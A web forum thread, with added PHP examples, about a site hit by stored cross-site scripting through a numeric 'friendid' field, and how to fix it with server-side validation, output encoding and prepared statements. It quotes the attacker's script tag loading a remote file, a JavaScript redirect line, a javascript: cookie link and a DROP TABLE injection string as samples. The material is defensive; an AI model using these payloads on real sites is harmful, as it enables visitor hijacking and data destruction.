Hi, my site is coded in PHP. On my website, to register you need a friendid. The friendid can only be numeric and we have put a check on it... I don't know how this same person is able to enter <script src=http://usuc.us/j.php>jonny</script> in that numeric area where only 6 characters are allowed. Now once he enters it, that profile is displayed on the website and as soon as someone opens my website, it redirects to his website. I have deleted the record for now... but he will come back again and do the same thing. When I test the whole page, it works fine and nobody can enter a script tag... then how is he able to do that? Please help.
Firstly, is your check client side or server side? If it's getting into the database, it sounds like it's client side. Is the length limit controlled by JavaScript? If the check is client side, I'd say the user has disabled JavaScript. If the length is checked by JavaScript, well, same thing. If not, remember that just because you send a page to the user and that page has a length limit in it doesn't mean that the user is going to be limited by it... there are a number of different ways it could be done (save / edit / load the page locally, use a browser that ignores length limits, etc.).
Hi, my check is both client side and server side. But why is my application regarding this <script src=http://usuc.us/j.php>jonny</script> as a script to redirect? For example, I am putting this here: <script src=http://usuc.us/j.php>jonny</script> And when you open this forum page, we are not getting redirected... but why is it that when you paste this code in any public area of my website, it works and the site gets redirected? How do I make my code just take this as text?
Because this site parses the information and shows it as it was typed, not as usable HTML, if that makes sense. If you select the text here and view the source of that selection, you will see that the < sign is represented in HTML as &lt;. Essentially, the code parses any HTML and converts it to display as opposed to getting parsed. Sorry... I know that's not a great explanation, so I'm hoping you understand the 'underlying concepts' of HTML.
htmlentities() htmlspecialchars() Also, if the limit is 6 characters and you enforce it server side, it _would not_ be possible to do that... so I'm not sure you are checking it server side.
The reason it redirects is because the page is already being executed by PHP, and so it's searching for embedded code (which is all that PHP is); the user has entered a JS redirect function: window.location="http://www.usuc.us/enter/goto.php"; To solve this particular problem, make sure you use strip_tags(); however, I'd recommend doing a more thorough job of coding the forms in the first place.
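The point made in the last three replies (the forum encodes the payload before it reaches the browser, the site does not) can be shown directly. The following is an added example, not code from the thread or from the original site: it renders the attacker's string the vulnerable way and the htmlspecialchars() way, and then shows two caveats with strip_tags() that a practitioner should know before relying on it. The function names and the "Friend ID" markup are assumptions for illustration.

```php
<?php
declare(strict_types=1);

// Constructed sample: the string the attacker submitted as a "friendid".
$injected = '<script src=http://usuc.us/j.php>jonny</script>';

// Vulnerable rendering (assumed shape of the profile page): user data is
// concatenated straight into the HTML, so the browser parses the <script>
// tag and loads the remote file.
function renderProfileVulnerable(string $friendId): string
{
    return '<p>Friend ID: ' . $friendId . '</p>';
}

// Fixed rendering: every HTML-significant character (<, >, &, ", ') becomes
// an entity, so the browser displays the text instead of interpreting it.
// This is what the forum software does to the posts above.
function renderProfileSafe(string $friendId): string
{
    return '<p>Friend ID: '
        . htmlspecialchars($friendId, ENT_QUOTES | ENT_HTML5, 'UTF-8')
        . '</p>';
}

echo "Vulnerable: ", renderProfileVulnerable($injected), PHP_EOL;
echo "Encoded:    ", renderProfileSafe($injected), PHP_EOL;

// Caveat 1: strip_tags() deletes rather than encodes. A bare "<" followed by
// text is treated as the start of a tag, and everything after it is lost.
echo "strip_tags on payload:   ", strip_tags($injected), PHP_EOL;
echo "strip_tags on plain text: ", strip_tags('price a<b and c'), PHP_EOL;

// Caveat 2: with an allow-list, strip_tags() keeps the allowed tag together
// with all of its attributes, so a javascript: URL survives untouched.
$link = '<a href="javascript:alert(document.cookie)">profile</a>';
echo "strip_tags with <a> allowed: ", strip_tags($link, '<a>'), PHP_EOL;

// Encoding is the safe default for untrusted text going into HTML.
echo "Encoded link: ", htmlspecialchars($link, ENT_QUOTES | ENT_HTML5, 'UTF-8'), PHP_EOL;
```

Run it from the command line (php example.php) and compare the "Vulnerable" and "Encoded" lines: only the second one is inert in a browser. strip_tags() is a filter for text you intend to display as plain text; it does not replace encoding at the output point.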
How about using $the_friend_id = (int) $_REQUEST['friendid']; or whatnot? Type casting the variable as an integer should prevent it from being text, to my knowledge.
I prefer spending a little more time to develop code which does not rely on type, but rather enforces very strict content rules. I prefer to reduce all user input to that which is allowed and, when something is not allowed, I make it safe if it is to be redisplayed to the user. In your case, I would also make sure database content is neutered. I would listen to krakjoe on this issue and take the time to clean up your forms so that this problem does not reoccur.
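The difference between the (int) cast suggested two posts up and the strict content rule suggested here is worth seeing on real input. This is an added example, not code from the thread: it validates the friendid server side as "1 to 6 ASCII digits, nothing else" and rejects anything that does not match, and it runs the cast beside it so the silent acceptance is visible. The length rule, the function names and the request handling are assumptions for illustration.

```php
<?php
declare(strict_types=1);

// Assumed business rule from the first post: at most 6 characters, digits only.
const FRIEND_ID_MAX_LEN = 6;

// Strict validation: returns the id as an int, or null to reject the request.
// ctype_digit() rejects signs, spaces, letters and tags; strlen() enforces
// the limit in bytes, which is exact because every digit is one byte.
function validateFriendId(string $raw): ?int
{
    if ($raw === '' || strlen($raw) > FRIEND_ID_MAX_LEN || !ctype_digit($raw)) {
        return null;
    }
    return (int) $raw;
}

// Cast only: never rejects anything. PHP takes the leading numeric part, so
// "12<script ...>" becomes 12 and a pure tag becomes 0, and the request
// continues as if it were valid.
function castFriendId(string $raw): int
{
    return (int) $raw;
}

// Request handler (assumed shape): reject and stop, never "clean and continue".
function handleRegistration(array $post): string
{
    $id = validateFriendId((string) ($post['friendid'] ?? ''));
    if ($id === null) {
        http_response_code(400);
        return 'rejected: friendid must be 1 to 6 digits';
    }
    // $id is now a bounded int; safe to bind as an integer query parameter.
    return 'accepted: ' . $id;
}

// Constructed sample inputs, including the payload from the first post.
$samples = [
    '123456',
    '0',
    '1234567',
    '12<script src=http://usuc.us/j.php>jonny</script>',
    '<script src=http://usuc.us/j.php>jonny</script>',
    '-5',
    ' 42',
    '',
];

foreach ($samples as $raw) {
    $strict = validateFriendId($raw);
    printf(
        "%-55s strict=%-8s cast=%d\n",
        var_export($raw, true),
        $strict === null ? 'REJECT' : (string) $strict,
        castFriendId($raw)
    );
}

echo handleRegistration(['friendid' => '123456']), PHP_EOL;
echo handleRegistration(['friendid' => '<script src=http://usuc.us/j.php>jonny</script>']), PHP_EOL;
```

The strict column is the one to build on: the server-side check this thread asks for is "does the input match the allowed form exactly", not "can PHP coerce it into a number". The cast is still useful after validation, as the last step that produces the typed value the rest of the code works with.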
Thanks a lot guys... I took your advice and cleaned up the code. That's the best way to protect against all this: strict server side validation and using strip_tags kind of functions.
If there are any options to enable HTML in your site/code, forum or whatever, then disable them. I hope it works.
A lot of research needs to be done in that area, tom007, to learn how to cover all of the different evil possibilities! If you use a MySQL database, you may need to look up the mysql escape string function, too.
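The last reply points at the MySQL escape-string function for the database side. The added example below (not code from the thread) shows the alternative that removes the need for hand escaping: a prepared statement with bound parameters, where the value never becomes part of the SQL text. It uses PDO with an in-memory SQLite database so that it runs offline; the table, column names and the hostile sample value are assumptions for illustration, and the same PDO calls work against MySQL with a mysql: DSN.

```php
<?php
declare(strict_types=1);

// In-memory SQLite so the example runs without a server; swap the DSN for
// 'mysql:host=...;dbname=...' to use the same code against MySQL.
$db = new PDO('sqlite::memory:', null, null, [
    PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
]);
$db->exec(
    'CREATE TABLE profiles (
        id INTEGER PRIMARY KEY,
        friend_id INTEGER NOT NULL,
        display_name TEXT NOT NULL
    )'
);

// Insert with bound parameters: quotes, semicolons and comment markers in
// $displayName are stored as data and cannot change the statement.
function insertProfile(PDO $db, int $friendId, string $displayName): int
{
    $stmt = $db->prepare(
        'INSERT INTO profiles (friend_id, display_name) VALUES (:fid, :name)'
    );
    $stmt->bindValue(':fid', $friendId, PDO::PARAM_INT);
    $stmt->bindValue(':name', $displayName, PDO::PARAM_STR);
    $stmt->execute();
    return (int) $db->lastInsertId();
}

// Lookup by the validated integer id, again as a bound parameter.
function findProfile(PDO $db, int $friendId): ?array
{
    $stmt = $db->prepare(
        'SELECT friend_id, display_name FROM profiles WHERE friend_id = :fid'
    );
    $stmt->bindValue(':fid', $friendId, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed sample: a display name that would break a string-built query.
$hostile = "jonny'); DROP TABLE profiles; --";
insertProfile($db, 123456, $hostile);

$row = findProfile($db, 123456);
echo "stored verbatim: ", var_export($row['display_name'] === $hostile, true), PHP_EOL;

// The table is still there: the payload was data, not SQL.
$count = (int) $db->query('SELECT COUNT(*) FROM profiles')->fetchColumn();
echo "rows in profiles: ", $count, PHP_EOL;

// Storing it safely does not make it safe to print; encode at the output
// point as well before it goes into an HTML page.
echo "for HTML: ", htmlspecialchars($row['display_name'], ENT_QUOTES | ENT_HTML5, 'UTF-8'), PHP_EOL;
```

Parameter binding solves the SQL side only. The stored value comes back exactly as submitted, so the page that displays it still has to encode it for HTML; the two defences are independent and both are needed.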